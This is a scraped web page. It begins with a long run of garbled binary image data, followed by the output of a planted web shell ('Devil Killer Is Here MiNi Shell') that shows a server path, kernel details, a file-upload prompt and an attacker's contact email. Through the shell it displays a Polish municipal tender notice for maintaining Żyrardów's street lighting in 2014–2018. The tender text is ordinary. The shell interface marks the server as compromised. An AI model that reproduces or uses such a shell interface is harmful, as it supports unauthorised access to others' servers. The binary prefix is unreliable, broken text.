JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141031/361666-N-2014.html

<p class="kh_header"><b>Żyrardów: Konserwacja oświetlenia ulicznego na terenie Miasta Żyrardowa na lata 2014 - 2018</b><br>
<b>Numer ogłoszenia: 361666 - 2014; data zamieszczenia: 31.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrardow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego na terenie Miasta Żyrardowa na lata 2014 - 2018.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Konserwacja systemu oświetlenia ulicznego w okresie czterech lat, obejmująca :
Wymianę uszkodzonych źródeł światła z uwzględnieniem kosztów materiałów,
Wymianę uszkodzonych opraw ( bez kosztu oprawy ),
Naprawę uszkodzonych opraw z uwzględnieniem kosztów materiałów,
Wymianę zabezpieczeń opraw z uwzględnieniem kosztów materiałów,
Wymianę bądź naprawę uszkodzonych kabli ( bez kosztu kabla),
Wymianę uszkodzonych słupów oświetlenia ulicznego i osiedlowego ( bez kosztu słupów)
Wymianę na nowe lub wymianę z wyniesieniem poza budynek stacji 6  skrzynek SON  w miejscach wskazanych przez Zamawiającego, w skali czterech lat ( z materiałem).
Bieżącą kontrolę świecenia opraw,

Malowanie raz na trzy lata wysięgników oświetleniowych oraz metalowych skrzynek zasilających oświetlenie,

Malowanie metalowych słupów oświetlenia ulicznego od fundamentu do wysokości 0,6 m z częstotliwością raz dwa lata
Nocne patrole obszaru sieci oświetleniowej raz na dwa tygodnie,
Mycie kloszy opraw 1 raz w roku,
Raz w roku ( w okresie trwania zamówienia) montaż i demontaż dekoracyjnego oświetlenia świątecznego w ilości do 63 sztuk w terminach wyznaczonych przez zamawiającego ( ilość świątecznego oświetlenia może zostać zwiększona w skali roku do 10 sztuk nowej iluminacji świątecznej),
przegląd techniczny i doprowadzenie do sprawności w/w oświetlenia świątecznego przed jego zamontowaniem,ręczne wyłączanie i załączanie wybranego obwodu oświetlenia ulicznego podczas imprez Światełko do nieba, Spotkanie z Mikołajem,
Bieżąca konserwacja skrzynek zasilających i układów elektrycznych zasilających obwody oświetleniowe, przy uwzględnieniu kosztów  materiałów.
Wykonanie okresowych pomiarów elektrycznych w roku 2018 zgodnie z przepisami eksploatacji oświetlenia ulicznego  : 
	pomiary skuteczności ochrony przeciwporażeniowej ,
	pomiary rezystancji uziemień roboczych i ochronnych,
    sprawdzenie ciągłości żył linii kablowych oraz pomiary rezystancji izolacji,
	pomiary rezystancji izolacji przewodów instalacji w słupach zasilających oprawy oświetleniowe - w roku 2015r..
	Naprawa i dbanie o stan zamknięć i hermetyczności skrzynek bezpiecznikowych i zasilających,
	Prowadzenie dokumentacji eksploatacyjnej oraz innych czynności  zgodnie z przepisami i normami dotyczącymi eksploatacji oświetlenia zewnętrznego, w tym: 
	oględziny  stanu technicznego urządzeń nie rzadziej niż raz w roku,
	dokonywanie co 3 lata oceny stanu technicznego sieci oświetlenia ulicznego i przekazanie wyników w/w oceny do Zamawiającego oraz PGE Dystrybucja S.A., Rejon Energetyczny Łódź- Teren Żyrardów
	dokonywanie corocznej aktualizacja Instrukcji Współpracy ruchowej dla prowadzenia eksploatacji oświetlenia ulicznego,
	oględziny kontrolne świecenia opraw wykonywane wspólnie z przedstawicielem zamawiającego nie rzadziej niż raz na miesiąc,
	dokonywanie przeglądów okresowych sieci oświetlenia ulicznego nie rzadziej niż raz na dwa lata dla oświetlenia głównych ulic ( 1Maja, Mickiewicza, Jaktorowska, Reymonta, Okrzei, Limanowskiego, Mireckiego,  Żeromskiego, Bohaterów Warszawy, Środkowa, F.de Girarda, Kap. Pałaca, Skrowaczewskiego, Al. Partyzantów, Kościelna, Nietrzebki, Jedności Robotniczej ) ,
	sieci oświetlenia pozostałych ulic nie rzadziej niż raz na trzy lata,
	przeglądy aparatury łączeniowej i sterowniczej wraz z wymianą zużytych elementów i czyszczeniem tablic rozdzielczych i sterowniczych - raz na cztery lata ,
utylizacja zużytych lamp, zawarcie umowy na odbiór odpadów niebezpiecznych i uzyskanie pozwolenia na ich zagospodarowanie,
	Całodobowe przyjmowanie i rejestrowanie zgłoszeń dotyczących funkcjonowania oświetlenia ( prowadzenie książki zgłoszeń obejmujących obszar Miasta Żyrardowa administrowany przez Zamawiającego - wysyłanie codziennych raportów z realizacji napraw)


2.	Czas przystąpienia do usunięcia usterki :
	Duże awarie - 6h,
	Awarie całych ciągów - 4h,
	Awarie 10-15%ilości opraw w ciągach  8h,
	Pojedyncze awarie - 24h,
	Natychmiastowa reakcja w przypadku zaświecenia się lamp w dzień,
	Natychmiastowa reakcja w przypadku klęsk żywiołowych bądź wypadków drogowych. 

3.	Ilość punktów oświetleniowych i stacji zasilających :
	Ilość punktów oświetleniowych : 3548 szt.( zakładany wzrost ilości opraw rocznie :do 10 sztuk)
	Ilość stacji zasilających obwody oświetlenia ulicznego 91 sztuk 

Wyżej wymieniony zakres konserwacji obejmuje także niezbędne materiały związane z daną robotą . W pozycjach zaznaczonych uwagą bez kosztu materiału koszty wyszczególnionego materiału będą odrębnie doliczone w kosztorysie powykonawczym w oparciu o średnie ceny materiałów podane w cennikach SEKOCENBUDU w kwartale poprzedzającym okres wykonywania robót, natomiast cena robocizny i pracy sprzętu powinna być uwzględniona w stawce ryczałtowej za jedną oprawę. 

1	Wykonawca ponosi pełną odpowiedzialność za szkody wynikłe z powodu niewłaściwego wykonania prac i niewłaściwej organizacji robót i zabezpieczenia terenu na czas prowadzenia robót.
2	Oferent poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty.
3	Zaleca się, aby oferent zdobył wszelkie informacje dotyczące przedmiotu zamówienia np. dokonał wizji w terenie, co może być konieczne do przygotowania oferty i podpisania umowy.
4	Zgodnie z art. 144 ustawy p. z .p. istnieje zakaz dokonywania istotnych zmian postanowień w zawartej umowie w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy. Zmiana umowy dokonana z naruszeniem art..144 ust. 1 ustawy prawo zamówień publicznych podlega unieważnieniu.
5	Oznaczenie wg Wspólnego Słownika Zamówień : 50232100-1 - Usługi w zakresie konserwacji oświetlenia ulicznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości  10  000 zł słownie : dziesięć  tysięcy złotych.
1.	Wadium wnosi się przed upływem terminu składania ofert.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach :
	Pieniądzu na konto zamawiającego :
    nr. Bank PEKAO S.A.I.O/ Żyrardów 
811 240 3350 1111 0000 3540 1760 
 Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	Gwarancjach bankowych,
	Gwarancjach ubezpieczeniowych,
	Poręczeniach udzielonych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości( Dz. U. 2007 Nr. 42, poz 275 z późn. zm.) 
3. Jeżeli wadium będzie wnoszone w poręczeniach bankowych, gwarancjach, lub poręczeniach do oferty należy załączyć ich kopię , zaś oryginał złożyć w depozycie Urzędu Miasta, Wydział Gospodarki Komunalnej, pokój 23.Gwarancja wadium musi obejmować okres związania ofertą. 
4. Zamawiający zwraca niezwłocznie wadium zgodnie z art.46 prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadaja uprawnienia opisane w pkt.III SIWZ jeśli przepisy prawa nakładaja ich posiadanie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zapewnią stałą, całodobową łączność telefoniczną z dyżurnym zespołem konserwatorskim z czasem dojazdu na miejsce awarii nie dłuższym niż jedna godzina,
Prowadzą działalność zgodną z opisem zamówienia przynajmniej trzy lata przed dniem wszczęcia postępowania o zamówienie i  wykażą, że zrealizowali w ciągu ostatnich trzech lat co najmniej dwa zamówienia zgodnie z opisem zamówienia o wartości co najmniej porównywalnej z niniejszym zamówieniem.
Przez wartość porównywalną należy rozumieć wartość niemniejszą niż 80 % rocznej ceny oferty.
Jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia 
Posiadają zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów niebezpiecznych w postaci zużytych źródeł światła.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca powinien zatrudnić do wykonania robót na stanowiskach eksploatacyjnych pracowników, posiadających ważne grupy kwalifikacyjne do wykonywania prac konserwacyjno - remontowych urządzeń elektroenergetycznych do 1kV oraz na stanowiskach dozoru osoby, posiadające ważne grupy kwalifikacyjne do kierowania czynnościami osób zatrudnionych na stanowiskach eksploatacji urządzeń elektroenergetycznych do 1kV ,
-	 wykonawca powinien dysponować co najmniej następującym sprzętem :
podnośnik samochodowy - samochodowy hydrauliczny,
samochód ciężarowy do 5,5 tony, 
żuraw samochodowy ,
świdrostawiacz,
Amperomierze cęgowe do pomiaru  prądu obciążenia linii oświetleniowych,
Wykonawca zobowiązany jest do stosowania podczas realizacji czynności konserwacyjnych wyłącznie wyrobów, materiałów oraz urządzeń posiadających aktualne dokumenty dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie. Wykonawca ponosi odpowiedzialność za jakość wykonywanych czynności konserwacyjnych oraz zastosowanych materiałów i urządzeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia :
wykonawca powinien zatrudnić do wykonania robót na stanowiskach eksploatacyjnych pracowników, posiadających ważne grupy kwalifikacyjne do wykonywania prac konserwacyjno  remontowych urządzeń elektroenergetycznych do 1kV oraz na stanowiskach dozoru osoby, posiadające ważne grupy kwalifikacyjne do kierowania czynnościami osób zatrudnionych na stanowiskach eksploatacji urządzeń elektroenergetycznych do 1kV</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn. posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 100 000 zł
1.4 Nie podlegają wykluczeniu z  postępowania o udzielenie zamówienia .
1.5.Ubezpieczą swoją działalność od odpowiedzialności cywilnej na kwotę nie mniejszą niż 200 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta  Żyrardowa
ul. Plac Jana Pawła II nr 1
Kod 96-300 Żyrardów
Wydział Gospodarki Komunalnej , pok. 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2014 godzina 11:00, miejsce: Urząd Miasta  Żyrardowa
ul. Plac Jana Pawła II nr 1
Kod 96-300 Żyrardów
Biuro Obsługi Mieszkańców.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com